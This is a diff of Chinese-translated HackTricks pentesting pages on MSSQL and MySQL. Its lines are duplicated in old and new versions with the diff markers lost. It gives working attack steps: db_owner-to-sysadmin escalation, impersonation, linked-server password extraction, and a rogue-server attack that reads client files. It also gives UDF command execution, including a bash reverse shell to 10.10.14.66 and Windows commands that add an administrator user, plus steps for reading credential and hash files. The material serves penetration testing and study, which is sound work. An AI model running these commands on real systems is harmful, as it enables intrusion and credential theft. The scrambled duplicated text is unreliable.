还有其他方法可以实现命令执行,例如添加[扩展存储过程](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server)、[CLR 程序集](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration)、[SQL Server 代理作业](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15)和[外部脚本](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql)。
还有其他方法可以获取命令执行,例如添加 [扩展存储过程](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server)、[CLR程序集](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration)、[SQL Server代理作业](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15) [外部脚本](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql)。
## MSSQL 权限提升
## MSSQL权限提升
### 从 db_owner 提升至 sysadmin
### 从db\_owner到sysadmin
如果将**普通用户**赋予**`db_owner`**角色,而该角色是由管理员用户(如**`sa`**)拥有的数据库所有权,并且该数据库配置为**`trustworthy`**,那么该用户可以滥用这些权限进行权限提升,因为在其中创建的**存储过程**可以作为所有者(**管理员**)执行。
如果一个**普通用户**被授予**`db_owner`**角色,且该数据库由管理员用户(如**`sa`**)拥有,并且该数据库被配置为**`trustworthy`**,那么该用户可以滥用这些权限进行**权限提升**,因为在其中创建的**存储过程**可以作为所有者(**管理员**)执行。
```sql
# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases
@ -386,11 +389,11 @@ EXEC sp_elevate_me
--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')
```
你可以使用一个**metasploit**模块:
您可以使用一个 **metasploit** 模块:
```bash
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
```
一个 **PS** 脚本:
或一个 **PS** 脚本:
```powershell
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
@ -398,7 +401,7 @@ Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlSer
```
### 冒充其他用户
SQL Server有一个特殊权限,名为**`IMPERSONATE`**,允许执行用户承担另一个用户或登录的权限,直到上下文被重置或会话结束。
SQL Server 有一个特殊权限,名为 **`IMPERSONATE`**,它 **允许执行用户获取另一个用户或登录的权限**,直到上下文被重置或会话结束。
```sql
# Find users you can impersonate
SELECT distinct b.name
@ -414,10 +417,10 @@ SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
```
{% hint style="info" %}
如果您可以冒充一个用户即使他不是sysadmin您应该检查用户是否可以访问其他数据库或链接服务器。
请注意一旦您成为sysadmin您可以冒充任何其他用户
如果您可以冒充一个用户,即使他不是 sysadmin您应该检查该用户是否可以访问其他数据库或链接服务器。
{% endhint %}
请注意,一旦您成为 sysadmin您可以冒充任何其他用户
```sql
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
@ -427,42 +430,42 @@ SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT
```
你可以使用一个**metasploit**模块执行这个攻击:
您可以使用 **metasploit** 模块执行此攻击:
```bash
msf> auxiliary/admin/mssql/mssql_escalate_execute_as
```
使用 **PS** 脚本:
或使用 **PS** 脚本:
```powershell
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!
```
## 使用MSSQL进行持久化
## 使用 MSSQL 进行持久化
[https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/](https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/)
## 从SQL Server Linked Servers中提取密码
## 从 SQL Server 连接服务器提取密码
攻击者可以从SQL实例中提取SQL Server Linked Servers密码并以明文形式获取这些密码从而授予攻击者可以用来在目标上获得更大立足点的密码。可以在[此处](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords)找到用于提取和解密存储在Linked Servers中的密码的脚本
攻击者可以从 SQL 实例中提取 SQL Server 连接服务器的密码,并以明文形式获取它们,从而使攻击者获得可以用于在目标上获得更大立足点的密码。提取和解密存储在连接服务器中的密码的脚本可以在 [这里](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords) 找到。
使此漏洞利用生效必须执行一些要求和配置。首先您必须在计算机上拥有管理员权限或者具有管理SQL Server配置的能力
了使此漏洞利用有效,必须进行一些要求和配置。首先,您必须在机器上具有管理员权限,或能够管理 SQL Server 配置
在验证权限后,您需要配置三件事,即
在验证您的权限后,您需要配置以下三项内容
1. 在SQL Server实例上启用TCP/IP
2. 添加一个启动参数,在本例中,将添加一个跟踪标志,即-T7806。
1. 在 SQL Server 实例上启用 TCP/IP
2. 添加启动参数,在这种情况下,将添加一个跟踪标志,即 -T7806。
3. 启用远程管理员连接。
要自动化这些配置,[此存储库](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/)具有所需的脚本。除了为每个配置步骤提供PowerShell脚本外该存储库还具有一个完整脚本,结合了配置脚本以及密码的提取和解密。
要自动化这些配置,[这个仓库](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/)提供了所需的脚本。除了为每个配置步骤提供 PowerShell 脚本外,该仓库还提供了一个完整的脚本,结合了配置脚本以及密码的提取和解密。
有关此攻击的更多信息,请参考以下链接:[解密MSSQL数据库链接服务器密码](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/)
有关此攻击的更多信息,请参阅以下链接:[解密 MSSQL 数据库链接服务器密码](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/)
[解决SQL Server专用管理员连接问题](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/)
[排除 SQL Server 专用管理员连接故障](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/)
## 本地权限提升
运行MSSQL服务器的用户将启用特权令牌**SeImpersonatePrivilege**。\
您可能能够通过以下两个页面之一**提升为管理员**
运行 MSSQL 服务器的用户将启用特权令牌 **SeImpersonatePrivilege.**\
您可能能够通过以下两个页面之一 **提升到管理员**
{% content-ref url="../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" %}
[roguepotato-and-printspoofer.md](../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md)
@ -476,15 +479,15 @@ Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuse
* `port:1433 !HTTP`
## 参考资料
## 参考文献
* [如何获取所有数据库用户列表](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
* [SQL Server登录用户权限](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
* [高级MSSQL注入技巧](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
* [黑客SQL Server存储过程 - 第1部分不可信数据库](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
* [黑客SQL Server存储过程 - 第2部分用户冒充](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/)
* [通过Metasploit在SQL Server上执行SMB中继攻击](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/)
* [操作注册表中的SQL Server](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/) **Try Hard Security Group**
* [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
* [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
* [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
* [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
* [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/)
* [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/)
* [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/) **Try Hard Security Group**
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -492,7 +495,7 @@ Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuse
***
## HackTricks自动命令
## HackTricks 自动命令
```
Protocol_Name: MSSQL #Protocol Abbreviation if there is one.
Port_Number: 1433 #Comma separated if there is more than one.
@ -548,16 +551,17 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

302
network-services-pentesting/pentesting-mysql.md
View file

@ -1,28 +1,29 @@
# 3306 - 渗透测试 Mysql
# 3306 - Pentesting Mysql
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一,也是**欧洲**最重要的之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点交流会
[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会的 **使命是促进技术知识**,是各个学科技术和网络安全专业人士的热烈交流平台
{% embed url="https://www.rootedcon.com/" %}
## **基本信息**
**MySQL** 可以被描述为一种开源的**关系数据库管理系统RDBMS**,可免费使用。它运行在**结构化查询语言SQL**上,可以管理和操作数据库
**MySQL** 可以被描述为一个开源的 **关系数据库管理系统 (RDBMS)**,可免费使用。它基于 **结构化查询语言 (SQL)**,使得数据库的管理和操作成为可能
**默认端口:** 3306
```
@ -40,9 +41,9 @@ mysql -u root -p # A password will be asked (check someone)
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
```
## 外部枚举
## External Enumeration
些枚举操作需要有效的凭据
些枚举操作需要有效的凭据
```bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
@ -96,7 +97,7 @@ quit;
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'
```
### MySQL权限枚举
### MySQL 权限枚举
```sql
#Mysql
SHOW GRANTS [FOR user];
@ -119,31 +120,37 @@ SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCT
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
```
### MySQL文件RCE
您可以在文档中查看每个权限的含义:[https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute)
## 通过客户端进行MySQL任意文件读取
### MySQL 文件 RCE
实际上,当您尝试将**本地数据加载到表中**时,**MySQL或MariaDB服务器会要求客户端读取文件并发送内容**。**因此如果您能够篡改一个MySQL客户端以连接到您自己的MySQL服务器您就可以读取任意文件。**\
请注意,这是使用以下行为:
{% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %}
[mysql-ssrf.md](../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
{% endcontent-ref %}
## MySQL 客户端任意读取文件
实际上,当您尝试 **load data local into a table** 文件的 **内容**MySQL 或 MariaDB 服务器会要求 **客户端读取它** 并发送内容。**然后,如果您可以篡改一个 mysql 客户端以连接到您自己的 MySQL 服务器,您可以读取任意文件。**\
请注意,这是使用以下方式的行为:
```bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
```
(注意"local"这个词)\
因为没有"local",你可能会得到:
(注意“local”这个词)\
因为没有“local”你可能会得到
```bash
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
```
**初始 PoC:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\
**在这篇论文中,您可以看到对攻击的完整描述,甚至如何将其扩展到 RCE** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**在这里,您可以找到对攻击的概述:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)
**在这篇论文中,您可以看到攻击的完整描述,甚至如何将其扩展到 RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**在这里您可以找到攻击的概述:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一,也是**欧洲**最重要的活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点聚会
[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会的 **使命是促进技术知识**,是各个学科的技术和网络安全专业人士的一个热烈的交流平台
{% embed url="https://www.rootedcon.com/" %}
@ -151,23 +158,23 @@ ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv opti
### Mysql 用户
如果 mysql 以 **root** 用户身份运行,将非常有趣:
如果 mysql 以 **root** 身份运行,将非常有趣:
```bash
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
```
#### MySQL 配置文件 mysqld.cnf 的危险设置
#### mysqld.cnf 的危险设置
在 MySQL 服务的配置中,采用了各种设置来定义其操作和安全措施:
在 MySQL 服务的配置中,使用各种设置来定义其操作和安全措施:
- **`user`** 设置用于指定 MySQL 服务将在哪个用户下执行。
- **`password`** 用于建立与 MySQL 用户关联的密码。
- **`admin_address`** 指定在管理网络接口上监听 TCP/IP 连接的 IP 地址。
- **`debug`** 变量表示当前的调试配置,包括日志中的敏感信息。
- **`sql_warnings`** 管理在单行 INSERT 语句出现警告时是否生成信息字符串,其中包含日志中的敏感数据。
- 使用 **`secure_file_priv`** 限制数据导入和导出操作的范围,以增强安全性。
* **`user`** 设置用于指定 MySQL 服务将以哪个用户身份执行。
* **`password`** 用于建立与 MySQL 用户关联的密码。
* **`admin_address`** 指定在管理网络接口上监听 TCP/IP 连接的 IP 地址。
* **`debug`** 变量指示当前的调试配置,包括日志中的敏感信息。
* **`sql_warnings`** 管理在出现警告时是否为单行 INSERT 语句生成信息字符串,日志中包含敏感数据。
* 使用 **`secure_file_priv`**,数据导入和导出操作的范围受到限制,以增强安全性。
### 权升
### 权限提
```bash
# Get current user (an all users) privileges and hashes
use mysql;
@ -187,16 +194,16 @@ grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mys
```
### 通过库进行权限提升
如果 **mysql 服务器以 root 用户身份运行**(或其他更高特权用户),您可以让其执行命令。为此,您需要使用 **用户定义函数**。要创建用户定义函数,您将需要一个运行 mysql 的操作系统**库**
如果 **mysql 服务器以 root 身份运行**(或其他更高权限的用户),您可以使其执行命令。为此,您需要使用 **用户定义函数**。要创建用户定义函数,您将需要一个 **库**,该库适用于运行 mysql 的操作系统。
可以在 sqlmap 和 metasploit 中找到要使用的恶意库,方法是执行 **`locate "*lib_mysqludf_sys*"`** 命令。**`.so`** 文件是 **Linux** 库,而 **`.dll`** 文件是 **Windows** 库,选择您需要的那个
可以在 sqlmap 和 metasploit 中找到要使用的恶意库,通过执行 **`locate "*lib_mysqludf_sys*"`**。**`.so`** 文件是 **linux** 库,**`.dll`** 是 **Windows** 库,选择您需要的
如果您 **没有** 这些库,您可以 **寻找它们**,或者下载这个 [**Linux C 代码**](https://www.exploit-db.com/exploits/1518) 并在易受攻击的 Linux 机器上 **编译**
如果您 **没有** 这些库,您可以 **寻找它们**,或下载这个 [**linux C 代码**](https://www.exploit-db.com/exploits/1518) 并 **在 linux 漏洞机器中编译**
```bash
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```
现在您已经有了库作为特权用户root登录到Mysql中,并按照以下步骤操作:
现在您已经拥有了库以特权用户root身份登录到Mysql,并按照以下步骤操作:
#### Linux
```sql
@ -218,8 +225,6 @@ create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
```
#### Windows
#### Windows
```sql
# CHech the linux comments for more indications
@ -232,23 +237,23 @@ CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```
### 从文件中提取MySQL凭据
### 从文件中提取 MySQL 凭据
_/etc/mysql/debian.cnf_ 文件中,您可以找到用户 **debian-sys-maint** 的 **明文密码**
_/etc/mysql/debian.cnf_ 中,您可以找到用户 **debian-sys-maint****明文密码**
```bash
cat /etc/mysql/debian.cnf
```
您可以**使用这些凭据登录mysql数据库**。
您可以**使用这些凭据登录mysql数据库**。
在文件_/var/lib/mysql/mysql/user.MYD_ 中,您可以找到**所有MySQL用户的哈希值**可以从数据库中的mysql.user中提取的哈希值_._
在文件_ /var/lib/mysql/mysql/user.MYD _中您可以找到**所有MySQL用户的哈希**您可以从数据库中的mysql.user提取的那些_
您可以执行以下操作提取它们:
您可以通过以下方式提取它们:
```bash
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```
### 启用日志记录
您可以在`/etc/mysql/my.cnf`文件中取消注释以下行以启用mysql查询的日志记录:
您可以通过取消注释以下行在 `/etc/mysql/my.cnf` 中启用 mysql 查询的日志记录:
![](<../.gitbook/assets/image (899).png>)
@ -256,27 +261,27 @@ grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_na
配置文件
- windows \*
- config.ini
- my.ini
- windows\my.ini
- winnt\my.ini
- \<InstDir>/mysql/data/
- unix
- my.cnf
- /etc/my.cnf
- /etc/mysql/my.cnf
- /var/lib/mysql/my.cnf
- \~/.my.cnf
- /etc/my.cnf
- 命令历史
- \~/.mysql.history
- 日志文件
- connections.log
- update.log
- common.log
* windows \*
* config.ini
* my.ini
* windows\my.ini
* winnt\my.ini
* \<InstDir>/mysql/data/
* unix
* my.cnf
* /etc/my.cnf
* /etc/mysql/my.cnf
* /var/lib/mysql/my.cnf
* \~/.my.cnf
* /etc/my.cnf
* 命令历史
* \~/.mysql.history
* 日志文件
* connections.log
* update.log
* common.log
## 默认的MySQL数据库/表
## 默认 MySQL 数据库/表
{% tabs %}
{% tab title="information_schema" %}
@ -520,87 +525,83 @@ schema\_index\_statistics\
schema\_object\_overview\
schema\_redundant\_indexes\
schema\_table\_lock\_waits\
{% endtab %}
{% endtabs %}
```markdown
schema_table_statistics\
schema_table_statistics_with_buffer\
schema_tables_with_full_table_scans\
schema_unused_indexes\
schema\_table\_statistics\
schema\_table\_statistics\_with\_buffer\
schema\_tables\_with\_full\_table\_scans\
schema\_unused\_indexes\
session\
session_ssl_status\
statement_analysis\
statements_with_errors_or_warnings\
statements_with_full_table_scans\
statements_with_runtimes_in_95th_percentile\
statements_with_sorting\
statements_with_temp_tables\
sys_config\
user_summary\
user_summary_by_file_io\
user_summary_by_file_io_type\
user_summary_by_stages\
user_summary_by_statement_latency\
user_summary_by_statement_type\
session\_ssl\_status\
statement\_analysis\
statements\_with\_errors\_or\_warnings\
statements\_with\_full\_table\_scans\
statements\_with\_runtimes\_in\_95th\_percentile\
statements\_with\_sorting\
statements\_with\_temp\_tables\
sys\_config\
user\_summary\
user\_summary\_by\_file\_io\
user\_summary\_by\_file\_io\_type\
user\_summary\_by\_stages\
user\_summary\_by\_statement\_latency\
user\_summary\_by\_statement\_type\
version\
wait_classes_global_by_avg_latency\
wait_classes_global_by_latency\
waits_by_host_by_latency\
waits_by_user_by_latency\
waits_global_by_latency\
x$host_summary\
x$host_summary_by_file_io\
x$host_summary_by_file_io_type\
x$host_summary_by_stages\
x$host_summary_by_statement_latency\
x$host_summary_by_statement_type\
x$innodb_buffer_stats_by_schema\
x$innodb_buffer_stats_by_table\
x$innodb_lock_waits\
x$io_by_thread_by_latency\
x$io_global_by_file_by_bytes\
x$io_global_by_file_by_latency\
x$io_global_by_wait_by_bytes\
x$io_global_by_wait_by_latency\
x$latest_file_io\
x$memory_by_host_by_current_bytes\
x$memory_by_thread_by_current_bytes\
x$memory_by_user_by_current_bytes\
x$memory_global_by_current_bytes\
x$memory_global_total\
wait\_classes\_global\_by\_avg\_latency\
wait\_classes\_global\_by\_latency\
waits\_by\_host\_by\_latency\
waits\_by\_user\_by\_latency\
waits\_global\_by\_latency\
x$host\_summary\
x$host\_summary\_by\_file\_io\
x$host\_summary\_by\_file\_io\_type\
x$host\_summary\_by\_stages\
x$host\_summary\_by\_statement\_latency\
x$host\_summary\_by\_statement\_type\
x$innodb\_buffer\_stats\_by\_schema\
x$innodb\_buffer\_stats\_by\_table\
x$innodb\_lock\_waits\
x$io\_by\_thread\_by\_latency\
x$io\_global\_by\_file\_by\_bytes\
x$io\_global\_by\_file\_by\_latency\
x$io\_global\_by\_wait\_by\_bytes\
x$io\_global\_by\_wait\_by\_latency\
x$latest\_file\_io\
x$memory\_by\_host\_by\_current\_bytes\
x$memory\_by\_thread\_by\_current\_bytes\
x$memory\_by\_user\_by\_current\_bytes\
x$memory\_global\_by\_current\_bytes\
x$memory\_global\_total\
x$processlist\
x$ps_digest_95th_percentile_by_avg_us\
x$ps_digest_avg_latency_distribution\
x$ps_schema_table_statistics_io\
x$schema_flattened_keys\
x$schema_index_statistics\
x$schema_table_lock_waits\
x$schema_table_statistics\
x$schema_table_statistics_with_buffer\
x$schema_tables_with_full_table_scans\
x$ps\_digest\_95th\_percentile\_by\_avg\_us\
x$ps\_digest\_avg\_latency\_distribution\
x$ps\_schema\_table\_statistics\_io\
x$schema\_flattened\_keys\
x$schema\_index\_statistics\
x$schema\_table\_lock\_waits\
x$schema\_table\_statistics\
x$schema\_table\_statistics\_with\_buffer\
x$schema\_tables\_with\_full\_table\_scans\
x$session\
x$statement_analysis\
x$statements_with_errors_or_warnings\
x$statements_with_full_table_scans\
x$statements_with_runtimes_in_95th_percentile\
x$statements_with_sorting\
x$statements_with_temp_tables\
x$user_summary\
x$user_summary_by_file_io\
